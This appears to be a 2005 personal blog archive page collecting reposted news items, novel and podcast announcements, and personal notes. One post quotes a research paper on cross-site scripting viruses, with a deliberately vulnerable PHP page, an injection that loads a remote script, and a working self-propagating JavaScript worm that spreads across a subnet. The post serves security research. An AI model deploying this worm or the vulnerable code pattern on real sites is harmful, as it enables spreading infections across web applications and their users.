![]() |
||||
| ||||
![]() |
||||
|
||||
![]() |
![]() Saturday, October 15, 2005 [Doctorow] Down and Out podcast concludes[Doctorow] Down and Out podcast concludes Mark Forman is the podcaster who's been serializing my novel Down and Out in the Magic Kingdom read aloud, one chapter at a time, with backing from great, Creative Commons-licensed music. Today he concluded the reading with chapters nine and ten in one installment. Now he's embarked upon his next project, reading Lessig's magnificent Free Culture. Mark's podcast feed: http://legup.libsyn.com/rss Final installment: http://legup.blogspot.com/2005/10/and-so-it-goesdao10chap910.html Down and Out in the Magic Kingdom: http://craphound.com/down -- Cory Doctorow doctorow@craphound.com Friday, October 14, 2005 via cia.gov DNI AND D/CIA ANNOUNCE ESTABLISHMENT OF THE NATIONAL CLANDESTINE SERVICEThe Director of National Intelligence, John D. Negroponte, and the Director of the Central Intelligence Agency, Porter J. Goss, today announced the creation of the National Clandestine Service (NCS) at CIA.The initiative will strengthen the direction and leadership of human intelligence throughout the Intelligence Community (IC). The plan reflects the thinking of some of the most seasoned veterans in human intelligence collection, men and women with decades of experience in the field. Thursday, October 13, 2005 via Earth Observatory Newsroom NASA Blue Marble Next Generation![]() In celebration of the deployment of its Earth Observing System; NASA is pleased to share the newest in its series of stunning Earth images, affectionately named the “Blue Marble.” This new Earth imagery enhances the Blue Marble legacy by providing a detailed look at an entire year in the life of our planet. In sharing these Blue Marble images, NASA hopes the public will join with the agency in its continuing exploration of our world from the unique perspective of space. posted by Gary Williams at 10:49 PM | link | via wwww.bindshell.net The Cross-Site Scripting VirusAbstractThis paper explores the new threat of cross-site scripting (XSS) viruses. To date, cross site scripting has never been utilised to generate viruses. These viruses are a new species which are platform independent and not affected by common firewall configurations. XSS viruses could have a significant impact for Internet continuity, including distributed denial of service (DDOS) attacks, spam and dissemination of browser exploits. This is particularly relevant with the increasing sophistication of web browsers and the growing popularity of web based applications such as Wikis and Blogs.Update: Included in the paper is the following: The following crafted permanent XSS exploitable PHP page can be infected with a virus. The page accepts a parameter (param) value and writes it to a file (file.txt). This file is then returned in the request to the browser. The file will contain the previous value of the “param” parameter. If no parameter is passed it will display the file without updating it. Web Application: index.php <?php $p=$HTTP_GET_VARS[’param’]; $filename = “./file.txt”; if ($p != “”) { $handle=fopen($filename, “wb”); fputs($handle, $p); fclose($handle); } $handle = fopen($filename, “r”); $contents = fread($handle, filesize($filename)); fclose($handle); print $contents; ?> This page (index.php) was hosted on multiple virtual servers within a 10.0.0.0/24 subnet. One web application instance was then seeded with the following code which retrieves a javascript file and executes it. Alternatively, it is possible to inject the entire code into the vulnerable applications rather than requesting a javascript file. For simplicity, a javascript file (xssv.jsp) was requested. Injected Seed Code: <iframe name=”iframex” id=”iframex” src=”hidden” style=”display:none”></iframe> <script SRC=”http://<webserver>/xssv.js”></script> The javascript file that was requested in the example is shown below. Its self-propagation uses an iframe which is periodically reloaded using the loadIframe() function. The target site IP address of the iframe is selected randomly within the 10.0.0.0/24 subnet via the function get_random_ip(). The XSS virus uses a combination of these two functions and the continual periodic invocation using the setInterval() function. Javascipt: xssv.jsp function loadIframe(iframeName, url) { if ( window.frames[iframeName] ) { window.frames[iframeName].location = url; return false; } else return true; } function do_request() { var ip = get_random_ip(); var exploit_string = '<iframe name="iframe2" id="iframe2" src="hidden" style="display:none"></iframe> <script SRC="http://<webserver>/xssv.js"></script>'; loadIframe('iframe2', "http://" + ip + "/index.php?param=" + exploit_string); } function get_random() { var ranNum= Math.round(Math.random()*255); return ranNum; } function get_random_ip() { return "10.0.0."+get_random(); } setInterval("do_request()", 10000); Viewing the seeded web application caused the browser to infect other web applications within the 10.0.0.0/24 subnet. This infection continued until some, but not all, applications were infected. At this point the browser was manually stopped. Another browser was then used to view one of the newly infected web applications. The virus then continued to infect the remaining uninfected web applications within the subnet. This proof of concept shows that under controlled conditions, not dissimilar to a real world environment, a XSS virus can be self-propagating and infectious. posted by Gary Williams at 1:57 PM | link | Wednesday, October 12, 2005 via Yahoo! News Buried clause could tag films, TV shows as pornBy Brooks Boliek Wed Oct 12, 3:18 AM ETWASHINGTON (Hollywood Reporter) - Tucked deep inside a massive bill designed to track sex offenders and prevent children from being victimized by sex crimes is language that could put many Hollywood movies in the same category as hard-core, X-rated films. The provision added to the Children's Safety Act of 2005 would require any film, TV show or digital image that contains a sex scene to come under the same government filing requirements that adult films must meet. Currently, any filmed sexual activity requires an affidavit that lists the names and ages of the actors who engage in the act. The film is required to have a video label that claims compliance with the law and lists where the custodian of the records can be found. The record-keeping requirement is known as Section 2257, for its citation in federal law. Violators could spend five years in jail. Under the provision inserted into the Children's Safety Act, the definition of sexual activity is expanded to include simulated sex acts like those that appear in many movies and TV shows. 'It's a significant and unprecedented expansion of the scope of the law,' one industry executive said. 'I don't think the studios would like being grouped in with the hard-core porn industry.' The provision, written by Rep. Mike Pence (news, bio, voting record), R-Ind., could have ramifications beyond simply requiring someone to ensure that the names and ages of actors who partake in pretend lovemaking as compliance with Section 2257 in effect defines a movie or TV show as a pornographic work under federal law. Industry sources say the provision was included in the bill at the behest of the Justice Department. Calls to Pence's office and the Justice Department went unreturned Tuesday. posted by Gary Williams at 8:12 PM | link | via Warrenellis.com Join The PodcastIF you’re making music yourself, and you’d like me to listen to your stuff towards including it in a podcast, email an mp3 towarrenellis@gmail.com Obviously, I won’t be able to include everything I receive in whatever podcast I finally make. But, frankly, podcasting has been so fucking boring of late that I feel like putting another music show out there. So any and all contributions to a podcast of unsigned and/or independent musicians would be gratefully received… posted by Gary Williams at 10:14 AM | link | Sig On The SpamToday I got a piece of spam with this really clever sig:---- The soul would have no rainbow had the eyes no tears. A teacher affects eternity; he cannever tell where his influence stops. My favorite thing is to go where I've never been. A critic is a legless man who teaches running. Conscience is a mother-in-law whose visit never ends RECONSIDER, v. To seek a justification for a decision already made. Who begins too much accomplishes little. A dreamer lives for eternity. There is nothing stronger in the world than gentleness. Who escapes duty, avoids a gain. You can't have everything. Where would you put it? Fear not those who argue but those who dodge. Chance fights ever on the side of the prudent. If all else fails, immortality can always be assured by spectacular error. Of all noises, I think music is the least disagreeable posted by Gary Williams at 10:01 AM | link | Monday, October 10, 2005 Using Flickr For Photo Stores OnNetMy homepage space (garywilliams.org) got full recently, so I deleted 19 meg of mp3s (my Chuck recordings)for photo space to use here on TFS, since I'm using free space from blogspot (I don't have disk space for images on blogspot). But the other night it occured to me that Claude uses flickr for her images on her blog, so today I learned how to use flickr images (you click on the "all sizes" button above a picture and it shows you the flickr address of the image as well as the original size image). Or you can right click and pick "View Picture" and it goes to the pure image and shows you the URL. So I downloaded the Flickr uploader and put this image from Gif Construction Set up as an example.Update:> Today's Penny Arcade had a link to a band's site that included a link to this free disk space site: ![]() So I'vev moved the Beginning Chuck examples' mp3's. You can check the links there, or see the new link page: http://www.putfile.com/gwms451 Doctorow] Themepunks five is live!Part five of Themepunks, my novel-in-progress, is up on Salon this morning. Themepunks is the story of a tech-boom driven by commodity hardware, three-d printers, and leftover geek talent going begging after the dotcom bust. Part five tells the story of Lester and Perry's next invention, and of Andrea's miserable homecoming to Northern California: > "Resource contention readily decomposes into a bunch of smaller > problems, with distinctive solutions. Take dishes: every dishwasher > should be designed with a 'clean' and a 'dirty' compartment -- > basically, two logical dishwashers. You take clean dishes out of > the clean side, use them, and put them into the dirty side. When > the dirty side is full, the clean side is empty, so you cycle the > dishwasher and the clean side becomes dirty and vice-versa. I had > some sketches for designs that would make this happen, but it > didn't feel right: making dishwashers is too industrial for us. I > either like making big chunks of art or little silver things you > can carry in your pocket." > > She smiled despite herself. She was drawing a half-million readers > a day by doing near-to-nothing besides repeating the mind-blowing > conversations around her. It had taken her a month to consider > putting ads on the site -- lots of feelers from blog "micro-labels" > who'd wanted to get her under management and into their banner > networks, and she broke down when one of them showed her a little > spreadsheet detailing the kind of long green she could expect to > bring in from a couple of little banners, with her getting the > right to personally approve every advertiser in the network. The > first month, she'd made more money than all but the most senior > writers on the Merc. The next month, she'd outstripped her own old > salary. She supposed it meant that she should make it official and > phone in a resignation to Jimmy, but they'd left it pretty > ambiguous as to whether she was retiring or taking a leave of > absence and she was reluctant to collapse that waveform into the > certainty of saying goodbye to her old life. > > "So I got to thinking about snitch-tags, radio frequency ID gizmos. > Remember those? When we started talking about them a decade ago, > all the privacy people went crazy, totally sure that these things > would be bad news. The geeks dismissed them as not understanding > the technology. Supposedly, an RFID can only be read from a couple > inches away -- if someone wanted to find out what RFIDs you had on > your person, they'd have to wand you, and you'd know about it." > > "Yeah, that was bull," Perry said. "I mean, sure you can't read an > RFID unless it's been excited with electromagnetic radiation, and > sure you can't do that from a hundred yards without frying > everything between you and the target. But if you had a subway > turnstile with an exciter built into it, you could snipe all the > tag numbers from a distant roof with a directional antenna. If > those things had caught on, there'd be exciters everywhere and > you'd be able to track anyone you wanted -- christ, they even put > RFIDs in the hundred-dollar bill for a while! Pickpockets could > have figured out whose purse was worth snatching from half a mile a > way!" Part five: http://www.salon.com/tech/feature/2005/10/10/themepunks_5/index.html Earlier installments: http://dir.salon.com/topics/cory_doctorow/ -- Cory Doctorow doctorow@craphound.com Sunday, October 09, 2005 ![]() In a Grueling Desert Race, a Winner, but Not a DriverBy JOHN MARKOFFPublished: October 9, 2005 ![]() The race, called the Grand Challenge, was a Pentagon project meant to promote the development of technologies for 21st-century automated warfare. The car was not immediately declared the winner because officials were doing final calculations, but race times on the event's Web site indicated that it had come in several minutes ahead of two entries from Carnegie Mellon University. The Stanford scientists who led the 18-month effort to build Stanley said they saw their victory as a significant leap forward in the field of artificial intelligence, a discipline that has long suffered from big promises that did not pan out. 'This is for people who say, 'Cars can't drive themselves,' ' said Sebastian Thrun, the director of the Stanford Artificial Intelligence Laboratory and co-leader of the Stanford team. 'These are the same people who said the Wright brothers wouldn't fly.' posted by Gary Williams at 1:31 PM | link | |
![]() |
|
![]() |
![]() |
|
![]() |
![]() |
||||
![]() |